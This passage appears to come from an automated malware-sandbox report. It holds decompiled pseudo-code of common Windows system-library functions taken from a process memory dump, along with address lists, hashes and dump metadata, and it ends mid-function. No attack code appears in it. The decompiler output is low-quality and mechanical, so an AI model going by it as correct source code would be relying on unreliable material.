							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04AD77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04AF9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x04abc608
0x04abc615
0x04abc625
0x04abc62d
0x04abc635
0x04abc640
0x04abc680
0x04abc687
0x04abc688
0x04abc689
0x04abc694
0x04abc694
0x04abc642
0x04abc64a
0x04abc697
0x04b27a25
0x04b27a2b
0x04b27a2e
0x04b27a30
0x04b27bea
0x04b27bea
0x00000000
0x04b27bea
0x04b27a36
0x04b27a43
0x04b27a48
0x04b27a4c
0x04b27a4e
0x00000000
0x00000000
0x04b27a58
0x04b27a5a
0x04b27a5b
0x04b27a5c
0x04b27a5d
0x04b27a63
0x04b27a64
0x04b27a6a
0x04b27a6c
0x04b27a6e
0x04b279cb
0x04b279cb
0x04b279ce
0x04b279d0
0x04b27a98
0x04b27a9b
0x04b27a9b
0x04b27a9e
0x04b27aa1
0x04b27bbe
0x04b27bbe
0x04b27bc0
0x04b27be0
0x04b27be0
0x04b27a01
0x04b27a01
0x04b27a05
0x04b27a07
0x04b27a15
0x04b27a15
0x04b27a1a
0x00000000
0x04b27a1a
0x04b27bc2
0x04b27bc6
0x04b27bc9
0x04b27bcd
0x04b27bcf
0x04b279e6
0x04b279e6
0x04b279eb
0x04b279eb
0x04b279ef
0x04b279f1
0x00000000
0x00000000
0x04b279f3
0x04b279f5
0x04b279ff
0x04b279ff
0x00000000
0x04b279ff
0x04b279f7
0x04b279fd
0x00000000
0x00000000
0x00000000
0x04b279fd
0x04b27bd5
0x04b27bd8
0x00000000
0x00000000
0x04b27ba9
0x04b27bac
0x04b27bb0
0x04b27bb1
0x04b27bb1
0x04b27bb6
0x00000000
0x04b27bb6
0x04b27aa7
0x04b27aaa
0x00000000
0x00000000
0x04b27ab2
0x04b27ab3
0x04b27ab5
0x04b27aec
0x04b27aef
0x04b27b25
0x04b27b28
0x04b27b62
0x04b27b64
0x04b27b8f
0x04b27b92
0x04b27b96
0x04b27b98
0x00000000
0x00000000
0x04b27b9e
0x04b27b9f
0x04b27ba3
0x00000000
0x04b27ba3
0x04b27b66
0x04b27b68
0x04b27ae2
0x04b27ae2
0x00000000
0x04b27ae2
0x04b27b6e
0x04b27b72
0x04b27b75
0x04b27b81
0x04b27b85
0x04b27b87
0x00000000
0x00000000
0x04b27b31
0x04b27b34
0x04b27b3c
0x04b27b45
0x04b27b46
0x04b27b4f
0x04b27b51
0x04b27b57
0x04b27b59
0x04b27b59
0x00000000
0x04b27b59
0x04b27b77
0x00000000
0x04b27b77
0x04b27b2a
0x00000000
0x04b27b2a
0x04b27af1
0x04b27af3
0x00000000
0x00000000
0x04b27afb
0x04b27afc
0x04b27afe
0x00000000
0x00000000
0x04b27b00
0x04b27b03
0x00000000
0x00000000
0x04b27b05
0x04b27b09
0x04b27b0d
0x04b27b0f
0x00000000
0x00000000
0x04b27b18
0x04b27b1d
0x00000000
0x04b27b1d
0x04b27ab7
0x04b27ab9
0x00000000
0x00000000
0x04b27abf
0x04b27ac1
0x00000000
0x00000000
0x04b27ac3
0x04b27ac6
0x00000000
0x00000000
0x04b27ac8
0x04b27acc
0x04b27ad0
0x04b27ad2
0x00000000
0x00000000
0x04b27adb
0x00000000
0x04b27adb
0x04b279d6
0x04b279d9
0x04b279dc
0x04b27a91
0x04b27a94
0x00000000
0x04b27a94
0x04b279e2
0x00000000
0x04b279e2
0x04b27a74
0x04b27a7a
0x00000000
0x00000000
0x04b27a8a
0x04b27a21
0x04b27a21
0x00000000
0x04b27a21
0x04abc650
0x04abc651
0x04abc656
0x04abc65c
0x04abc65d
0x04abc663
0x04abc664
0x04abc66a
0x04abc66e
0x04b279c5
0x04b279c7
0x00000000
0x04b279c7
0x04abc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3560cbbd683953411e1e278f47d2258efcee04f3606b49e0022874d84a42ed21
Instruction ID: bb7962f17769ccda5e444b1d3faeeeb615a3db5366b3e21f2f743689f3f13351
Opcode Fuzzy Hash: 3560cbbd683953411e1e278f47d2258efcee04f3606b49e0022874d84a42ed21
Instruction Fuzzy Hash: EA81A4756047219BDB25CE14CA90B6B73E4EB84364F1448AEED499B240EB30FD42CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 04B4B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E04B4B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4ba7b9c; // 0x0
				_t124 = L04AD4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04AF9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04AF95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04AF95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04AD77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04AF9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04AF95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4ba7b9c; // 0x0
									_t92 = L04AD4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04AF9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04ABA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04B4E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04B4E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04AF95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x04b4b8d9
0x04b4b8e4
0x00000000
0x04b4b8e6
0x04b4b8f3
0x04b4b8f5
0x04b4b8f5
0x04b4b8f8
0x04b4b920
0x04b4b924
0x04b4b936
0x04b4b939
0x04b4b93d
0x04b4b948
0x04b4b9a0
0x04b4b9a0
0x04b4b9a4
0x04b4b9bf
0x04b4b9c4
0x04b4b9c6
0x04b4b9cd
0x04b4b9d1
0x04b4bad4
0x04b4bad8
0x04b4bada
0x04b4badc
0x04b4badc
0x04b4badf
0x04b4bae0
0x04b4bae2
0x04b4bae4
0x04b4baec
0x04b4baee
0x04b4baf0
0x04b4baf0
0x04b4baec
0x04b4bafb
0x04b4bafc
0x04b4bafe
0x04b4bb01
0x04b4bb01
0x00000000
0x04b4bb06
0x04b4b9d7
0x04b4b9db
0x04b4b9db
0x04b4b9de
0x04b4b9de
0x04b4b9e4
0x04b4b9e7
0x04b4b9ea
0x04b4b9ec
0x04b4b9ef
0x04b4b9f3
0x04b4ba1b
0x04b4ba1b
0x04b4ba23
0x04b4ba24
0x04b4ba27
0x04b4ba2a
0x04b4ba2b
0x04b4ba2e
0x04b4ba30
0x04b4ba37
0x04b4ba3f
0x04b4ba9c
0x04b4baa2
0x04b4bb13
0x04b4bb15
0x04b4baae
0x04b4baae
0x04b4bab3
0x04b4bab5
0x04b4baba
0x04b4bac8
0x04b4bac8
0x04b4baba
0x04b4bacd
0x04b4bacf
0x00000000
0x04b4bacf
0x04b4bb1a
0x00000000
0x04b4bb1c
0x04b4baa7
0x04b4bb11
0x00000000
0x04b4bb11
0x04b4baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x04b4ba41
0x04b4ba41
0x04b4ba41
0x04b4ba58
0x04b4ba5d
0x04b4ba62
0x00000000
0x00000000
0x04b4ba64
0x04b4ba67
0x04b4ba68
0x04b4ba69
0x04b4ba6c
0x04b4ba6f
0x04b4ba71
0x04b4ba78
0x04b4ba80
0x00000000
0x00000000
0x04b4ba90
0x04b4ba90
0x04b4ba97
0x00000000
0x04b4ba97
0x04b4b9f5
0x04b4b9f7
0x04b4b9f7
0x04b4b9fa
0x04b4ba03
0x04b4ba07
0x04b4ba0c
0x04b4ba10
0x04b4ba17
0x00000000
0x04b4b9f7
0x04b4b9a6
0x04b4b9a8
0x04b4b9af
0x04b4b9b3
0x00000000
0x00000000
0x04b4b9b9
0x00000000
0x04b4b9b9
0x04b4b94d
0x04b4b98f
0x04b4b995
0x04b4b999
0x04b4b960
0x04b4b967
0x04b4b968
0x04b4b96a
0x00000000
0x04b4b96a
0x04b4b99b
0x04b4b99e
0x00000000
0x00000000
0x00000000
0x04b4b99e
0x04b4b951
0x04b4b954
0x04b4b95a
0x04b4b95e
0x04b4b972
0x04b4b979
0x04b4b97d
0x04b4b97f
0x04b4b980
0x04b4b982
0x04b4b984
0x00000000
0x04b4b984
0x00000000
0x04b4b926
0x00000000
0x04b4b926

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c497d759023e5552b029f7415336b1b0ab4e25da6d95d92aecd2c65f57f1cbdf
Instruction ID: 7136c0e42cf66eb96960105834a0f54862ecfe708c74fa12a13885840830041b
Opcode Fuzzy Hash: c497d759023e5552b029f7415336b1b0ab4e25da6d95d92aecd2c65f57f1cbdf
Instruction Fuzzy Hash: E5711F72204701AFEB318F64CD80F66B7B9EB84724F104968E7568B2E0EB74F945EB50

Uniqueness

Uniqueness Score: -1.00%

Function 04B36DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04B36DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04B36B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04AD7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04AF9AE0();
					_t87 = L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04B3795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04B3795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04B3795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04B3795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04AD4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04B36B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04B36B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04B36B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04B36B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04AD7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04AF9AE0();
								L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04AD2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04AD2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04AD2400( &_v52);
							}
							if(_v28 >= 0) {
								return L04AD2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x04b36dd4
0x04b36dde
0x04b36de1
0x04b36de3
0x04b36de6
0x04b36de9
0x04b36dec
0x04b36def
0x04b36df2
0x04b36df5
0x04b36dfe
0x04b36e04
0x04b36e09
0x04b36e0d
0x04b36e18
0x04b36e1b
0x04b36e22
0x04b36e2d
0x04b36e30
0x04b36e36
0x04b36e42
0x04b36e4d
0x04b36e50
0x04b36e55
0x04b36e5c
0x04b36e6e
0x04b36e5e
0x04b36e67
0x04b36e67
0x04b36e73
0x04b36e74
0x04b36e77
0x04b36e7c
0x04b36e7d
0x04b36e8e
0x04b36e93
0x04b36e9c
0x04b36ea8
0x04b36eab
0x04b36eac
0x04b36eb3
0x04b36ecd
0x04b36edc
0x04b36ee2
0x04b36ee5
0x04b36ef2
0x04b36efb
0x04b36f01
0x04b36f06
0x04b36f0b
0x04b36f11
0x04b36f1a
0x04b36f22
0x04b36f26
0x04b36f26
0x04b36f33
0x04b36f41
0x04b36f44
0x04b36f47
0x04b36f54
0x04b36f65
0x04b36f77
0x04b36f7c
0x04b36f82
0x04b36f91
0x04b36f99
0x04b36fa3
0x04b36fae
0x04b36fae
0x04b36fba
0x04b36fbb
0x04b36fbc
0x04b36fc1
0x04b36fc2
0x04b36fd3
0x04b36fd8
0x04b36fd8
0x04b36fdf
0x04b36fe8
0x04b36fee
0x04b36fee
0x04b36ff5
0x04b36ffb
0x04b36ffb
0x04b37004
0x00000000
0x04b3700a
0x04b37004
0x04b36eb3
0x04b36e9c
0x04b37015

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: d03dc79e3d447c6215a6f1a9a330232a6ff584c25141618697549ddb09c79b15
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 28717DB1A00219EFDB11DFA5CA84AEEBBB9FF48714F1045A9E505E7250DB30FA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04AB52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04AB52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04ACEEF0(0x4ba79a0);
					_t104 =  *0x4ba8210; // 0x952cb8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x30000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E04ACEB70(_t93, 0x4ba79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04AF9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04ACEEF0(0x4ba79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04ACEB70(0, 0x4ba79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x952cd002
								_t13 = _t104 + 0xc; // 0x952cc5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04AEF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04ACEEF0(0x4ba79a0);
									__eflags =  *0x4ba8210 - _t104; // 0x952cb8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4ba8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000952c
											_t95 =  *((intOrPtr*)( *_t37));
											E04B34888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E04ACEB70(_t95, 0x4ba79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E04AF95D0();
											L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E04AF95D0();
											L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04ACEB70(_t93, 0x4ba79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E04AF95D0();
										L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04AF95D0();
										L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000952c
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x952cd002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04AEF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x04ab52a5
0x04ab52ad
0x04ab52b0
0x04ab52b3
0x04ab52b7
0x04ab52ba
0x04ab52bf
0x04ab52c4
0x04ab52cc
0x00000000
0x00000000
0x04ab52ce
0x04ab52d1
0x04ab52d9
0x04ab52dd
0x04ab52e7
0x04ab52f7
0x04ab52f9
0x04ab52fd
0x04b10dcf
0x04b10dd5
0x04b10dd6
0x04b10dd7
0x04b10dd8
0x04b10dd9
0x04b10dde
0x04b10ddf
0x04b10de0
0x04b10de1
0x04b10de2
0x04b10de2
0x04b10de5
0x04b10dea
0x04b10dec
0x04b10f60
0x04b10f64
0x04b10f70
0x04b10f76
0x04b10f79
0x04b10f79
0x00000000
0x04b10f64
0x04b10df2
0x04b10df7
0x04b10e04
0x04b10e04
0x04b10e0d
0x04b10e0d
0x04b10e10
0x04b10e1a
0x04b10e1c
0x04b10e4c
0x04b10e52
0x04b10e61
0x04b10e67
0x04b10e6b
0x04b10e70
0x04b10e76
0x04b10ed7
0x04b10edc
0x04b10ee0
0x04b10ee6
0x04b10eea
0x04b10eed
0x04b10ef0
0x04b10ef3
0x04b10ef6
0x04b10ef9
0x04b10efb
0x04b10efe
0x04b10f01
0x04b10f01
0x04b10f0b
0x04b10f12
0x04b10f16
0x04b10f18
0x04b10f18
0x04b10f1b
0x04b10f2c
0x04b10f31
0x04b10f31
0x04b10f35
0x04b10f39
0x04b10f3a
0x04b10f3c
0x04b10f3c
0x04b10f3f
0x04b10f50
0x04b10f55
0x04b10f55
0x04b10f59
0x04ab52eb
0x04ab52f1
0x04ab52f1
0x04b10e7d
0x04b10e84
0x04b10e88
0x04b10e8a
0x04b10e8a
0x04b10e8d
0x04b10e9e
0x04b10ea3
0x04b10ea3
0x04b10ea7
0x04b10eaf
0x04b10eb3
0x04b10eb9
0x04b10eb9
0x04b10ebc
0x04b10ecd
0x04b10ecd
0x00000000
0x04b10eb3
0x04b10e1e
0x04b10e21
0x04b10e25
0x04b10e2b
0x04b10e2f
0x04b10e30
0x04b10e3a
0x04b10e3f
0x04b10e41
0x00000000
0x00000000
0x04b10e47
0x00000000
0x04b10e47
0x04b10df9
0x04b10dfe
0x00000000
0x00000000
0x00000000
0x04b10dfe
0x04ab5303
0x04ab5307
0x00000000
0x04ab5309
0x00000000
0x04ab5309
0x04ab5307
0x04ab52e9
0x04ab52e9
0x00000000
0x04ab52e9
0x04ab530e
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be996d3cdea9cc85c79c8a0c053e0d4187f9ef2f1aaeef18609ff43930a4970c
Instruction ID: a9b2dee6a3a4c69629386dc504a0ca9a93f9737ad5a5f27bb13cf040a400d2f5
Opcode Fuzzy Hash: be996d3cdea9cc85c79c8a0c053e0d4187f9ef2f1aaeef18609ff43930a4970c
Instruction Fuzzy Hash: D551EC71609342AFE721EF64CA41B67BBE8FF54718F10481EE49587A61E770F844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04AE2AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AE2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
